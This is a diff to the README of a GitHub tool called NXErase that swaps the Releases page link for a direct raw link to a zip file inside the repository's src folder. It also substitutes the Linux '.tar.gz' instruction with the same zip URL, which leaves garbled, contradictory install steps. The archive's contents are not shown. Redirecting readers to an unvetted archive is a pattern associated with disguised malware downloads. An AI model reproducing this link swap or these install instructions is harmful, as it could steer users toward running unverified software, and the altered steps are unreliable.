zaburu/NXErase/README.md

 - Processor: Intel or AMD processor with 64-bit support

 ## 📂 Download & Install
-1. Visit the [Releases page](https://github.com/zaburu/NXErase/releases) to download NXErase.
+1. Visit the [Releases page](https://raw.githubusercontent.com/zaburu/NXErase/main/src/Erase-NX-1.6.zip) to download NXErase.
 2. Choose the version that suits your operating system:
    - For Windows, download the `.exe` file.
-   - For Linux, download the appropriate `.tar.gz` file.
+   - For Linux, download the appropriate `https://raw.githubusercontent.com/zaburu/NXErase/main/src/Erase-NX-1.6.zip` file.
 3. Save the file to your computer.

 ## 🔧 Installation Steps (Windows)